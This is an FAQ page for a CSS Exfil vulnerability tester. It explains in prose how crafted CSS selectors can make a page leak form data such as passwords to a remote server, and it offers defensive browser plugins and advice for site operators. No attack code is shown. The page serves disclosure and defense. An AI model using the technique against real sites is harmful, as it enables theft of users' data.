CSS Exfil Vulnerability Tester

What is this CSS vulnerability again?

The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).

How does this vulnerability tester page work?

This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.

If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript?

While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.

Woah! Is this page hacking my web browser? Is this page safe?

There is no malicious code on this page. This page simply attempts to use CSS to load four images by checking if a hidden field contains the text 'abc'.

So if I install your browser plugin I'll be safe, right?

Maybe. The Chrome and Firefox plugins presented above appear to guard against the type of CSS Exfil attacks presented in the technical write up. Although I am not aware of other methods of exploitation at this time, it doesn't mean that such an attack doesn't exist. As such: the plugins are provided as-is without any warranty or guarantee, under the MIT License. If you discover an attack method which bypasses the plugin I would certainly like to hear from you!

I installed your plugin, but it still says I'm vulnerable.

There may be another plugin that is causing this plugin from working properly. Try disabling all plugins and re-enabling each one at a time. When you find the plugin that's causing the problem let me know and I'll try to diagnose and push out an update.

I'm a website operator. How do I protect my users?

Read the technical write up to understand the anatomy of the vulnerability. At the bottom there is a section: Defense for Website Operators.

Why did you release this? Aren't you making the web less safe?

I certainly hope not! I'm as much at risk as you. I discovered the attack method described in my technical write up Fall 2017. It took a while to disclose the vulnerability as I wanted to not only understand the full scope, but provide a solution. The methods detailed are not necessarily new, so there is the possibility that such a technique has been used to harvest user data in the past, so public disclosure is the best path to a more secure web.

I installed your plugin. What else can I do to stay safe on the web?

Beyond keeping your browser up-to-date and being careful to not click on websites which may be risky or malicious, installing a privacy extension such as Privacy Badger (or alternative) and HTTPS Everywhere can go along way to protect your safety and privacy online.

What's the deal with that strange image you are using on the vulnerability tester?

The image is a screenshot of an Apple II graphical shareware demo called "DA BIN ICH ...". The demo consists of a Hi-Res portrait of a man who occasionally will wink and stick out his tongue. I wanted to use a quirky image as part of the vulnerability tester, and it's about as quirky as you can get.